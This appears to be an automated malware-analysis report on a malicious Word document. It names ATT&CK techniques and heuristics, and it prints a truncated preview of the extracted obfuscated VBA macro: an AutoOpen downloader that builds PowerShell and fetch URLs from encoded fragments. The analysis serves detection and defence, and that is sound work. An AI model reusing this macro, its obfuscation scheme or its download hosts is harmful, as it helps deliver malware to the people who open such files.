Verdict: MALICIOUS (risk score 182)
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a malicious OLE Word document carrying a VBA project. The macro defines an AutoOpen entry point, so it runs as soon as the document is opened with macros enabled, and it reaches a Shell() call, i.e. it hands a command line to the operating system with no further user interaction. The source is heavily obfuscated: the visible procedure opens with On Error Resume Next, so the junk arithmetic on undefined variables that pads every real statement (division by CLng of an empty variable would otherwise raise an error) is silently skipped, and the payload is assembled from string fragments passed through a custom decoder (HJjkJKD) with recurring junk tokens such as i6R+i6R mixed in. The fragments that survive in the preview resemble PowerShell syntax ([cHAR]..., .rePlace(...)) and pieces of http:// URLs, consistent with a downloader that fetches and executes a second-stage payload, a common delivery technique.
Heuristics (6)
- VBA macros detected (medium; OLE_VBA_MACROS; 3 related findings): the document contains VBA macro code.
- Shell() call in VBA (critical; OLE_VBA_SHELL).
- AutoOpen macro (high; OLE_VBA_AUTOOPEN).
- VBA p-code auto-exec with execution tokens (high; OLE_VBA_PCODE_AUTOEXEC_EXEC): the compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only macro documents and documents where source extraction failed, so the finding does not depend on visible source.
- Legacy WordBasic auto-exec macro marker (medium; OLE_LEGACY_WORDBASIC_AUTOEXEC): the OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface; by itself it attributes neither a downloader nor a parser CVE.
- Embedded URL (info; EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label says which channel (macro, JS, link annotation, document body, ...) reached it.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML XML namespace identifier that Office drawing parts reference; it names a schema rather than a download location and is expected in benign documents as well.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 27,067 bytes | 194499383e14c4b3c94bca54abdec7694cf006c834b1b70e6773fe5720cd3733 |
Preview of the extracted script (the analyzer shows the first 1,000 lines; the excerpt below is truncated further):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "oiLzYpNSzvv"
Function HiErZtOzlSK()
On Error Resume Next
Utwpfpf = 2707257 / CLng(OdsRjj) - 419145 * Cos(8448366) + ItOhjEw + 4206164
qCbaw = 3369886 / CLng(ikJLaZds) - 2582545 * Cos(8540593) + JYzDl + 1419755
WlqiwKR = 9483138 / CLng(TJtCkPY) - 6898410 * Cos(76910) + SFucR + 6871388
hJjwiVXzO = (vuzXSwioWBQuh) + HJjkJKD("zaVKhLtwwzKDwij'+'m2OadFJ1R+J1RIi6R+i6Rfi6J1R+J1RR+i6J1R+J1RRm2i6J1R+J1'+'RR+i6'+'R'+'leeoi6R'+'+i6RWi6R+J1R+J1RiXLe+DdUGOvD", 16, 102)
TNfqRP = 7913339 / CLng(nvmHjGQjjq) - 5952137 * Cos(3999689) + VEDaQDV + 4258608
EKUwEp = 1055524 / CLng(GmiLwpfVQ) - 675328 * Cos(5606115) + tMDSP + 9673022
hisAa = 9608614 / CLng(GTnkkjiw) - 6124616 * Cos(9661651) + GiajUCuR + 8241360
mwfaSH = (VOiwwwIwGkhZwB) + HJjkJKD("pRLvlmowhvXzOcAHDRjSAdHSwUnwTdiIBjC);breai6R+i6Rk;}'+'ci6R+i6Ratch{}i6R+i6R}i6R).rePlace(([cHAR]54+[cHAR]109+XLADzJ", 35, 77)
ZkMYM = 7508253 / CLng(taSKjpSjWRTjiQ) - 3944797 * Cos(6369036) + QlFWAQ + 3987685
rmrzoQGihnl = 7729798 / CLng(hKwivLtWIT) - 9684286 * Cos(6161280) + fvhNCsJo + 6570761
szRZiTnzjK = 3790991 / CLng(RWchcsKwWEHIn) - 7715217 * Cos(4375620) + nMHAib + 9298238
LWFhUQd = (qWwoXYnO) + HJjkJKD("kslUTMjjbMUuiEDaIbktEl'+'6mi6R+i6RJ1R+'+'J1RQi6R+i6Rn6'+'mQ+6i6R+i6RmJJE", 23, 48)
tQdKNIzFla = 4675349 / CLng(uZfkWcaSHpZW) - 4515578 * Cos(7591467) + zVsRIS + 6349181
HYFMG = 4377501 / CLng(YbSrriRjhWuNhs) - 1490164 * Cos(2083818) + XzbzMoGKM + 5938590
wkcOjT = 3280486 / CLng(QUNCiMuKjbYYto) - 113837 * Cos(8578529) + PdkGjuhvwLnLh + 6065122
FFMQRiaHvac = (zqGRYjLtPJAJP) + HJjkJKD("PSWDjiXUijsOPzNrdwiVLji6RJ1R+J1R+i6RLVzFkkriWUOwXSPNJ", 23, 14)
wjvIzklTz = 1089813 / CLng(nNRwBjrjZ) - 5974328 * Cos(1416878) + BHwBvVXLXwK + 6438554
TOqWzNf = 3122539 / CLng(XFuwHstnAwPjBU) - 8183475 * Cos(7055440) + CDPiFCnAFf + 8928354
pIRPJa = 133972 / CLng(CkjEIlmaXOqN) - 1335398 * Cos(9976658) + MTDUmWHiASRD + 1263467
jKiaBTCH = (zfNApvaD) + HJjkJKD("wZKUScJIlDi6R+i6'+'RCi6R+i6RX){i6R+i6Rtri6R+i6Ry{36ZYJ1R+J1RYU.i6R+i6ReoWDofm2WnlfoIMcpRQfZqkiNrfAWlUQcwfjvhchu", 10, 73)
SaKuIcNvt = 6123629 / CLng(rijcUBrbvEHJ) - 4134544 * Cos(8524662) + oVcpaBSA + 1060758
fSwEGHuSJ = 2225559 / CLng(lYYsAYXM) - 3846742 * Cos(4323596) + ZKmhqDwt + 5653878
aiZvi = 3128240 / CLng(JZzSQEkYhaQ) - 721326 * Cos(3147657) + CDEimJYt + 4400907
wQiaUo = (ZRzCBnlbZOSvG) + HJjkJKD("zGDODtvm1R+J1RQe6mi6R+i6RQ+6mQw-oi6R+i6RbJ1R+J1Rji6R+i6J1R+J1RReci6R+i6R6i6R+i6RmQ+XLe+XLe6mQt6i6R+i6Rmi6R+i6RQi6J1R+J1RR+i'+'6RJ1R+J1R) randoi6R+i6RnP", 9, 141)
iHTkVEijUN = 2800321 / CLng(ztLqGLQCAANL) - 4707174 * Cos(1797350) + OiDOEDHWaUh + 5582015
tVIUGjBqj = 912120 / CLng(nKjiYPIArtr) - 9675900 * Cos(9370712) + huGDlJcaDHKks + 4411465
alObppiwP = 7021688 / CLng(ZhLWMpjjA) - 8840834 * Cos(4394294) + qJXFGNp + 6136611
RwpSuJ = (ScvorIHW) + HJjkJKD("NPZkSsiv+'+i6R 36Zi6R+i6RSiXLe+XLe6RXLe+XLe+i6RDJ1R+J1Ri6R+i6RCXLe+XLe)XLe+XLe;&(JNXSDjsISF", 9, 74)
KNaQcC = 8289994 / CLng(aDrmOju) - 7093035 * Cos(913226) + fhEHwqQTzj + 1460068
ScIfHt = 2351500 / CLng(WlzUpNT) - 6268048 * Cos(6036046) + RnazJpiMoPKsEL + 2725983
rPjJk = 4496344 / CLng(WGiIGNqV) - 209666 * Cos(3193325) + EWlzzim + 3806049
hDJwFZOKjP = (nXlQVTJmZh) + HJjkJKD("YuEbhOYNntckJECDitaLeAR]87),[stRInG]['+'cHXLe+XLeJ1R+J1RAR]34) u4d & ( JwxshElLId[1]+JwxSHeLLId'+tcmkzTtXdDwFzwz", 20, 78)
sltEsiUr = 1618742 / CLng(PHRiNsVYu) - 207658 * Cos(5085008) + cNlmRnqU + 5875073
EwhzP = 1542302 / CLng(boXCsbtmNwFF) - 2927456 * Cos(458913) + pmKNMRVh + 9567924
fFCJEjrijH = 6722082 / CLng(YIvnn) - 8822870 * Cos(1477520) + ppppdzAO + 2412229
jjDwwq = (mGSvzawqLajd) + HJjkJKD("RzMjiBfdCBpOWq+J1XLe+XLe'+'Ri6Rbi6R+i6RF/?htti6R+i6RpXLe+XLe://38i6R+i6R'+'pol.i'+'6R+i6Rri6R+i6R'+'u/i6R+i6R37wTrAY/?htt'+'XLe+XLep:/i6R+i6R/J1R+J1Ri6R'+'+i6Rtrans-imi6RMENSGSY", 15, 156)
sscXCT = 8285831
```
... (truncated)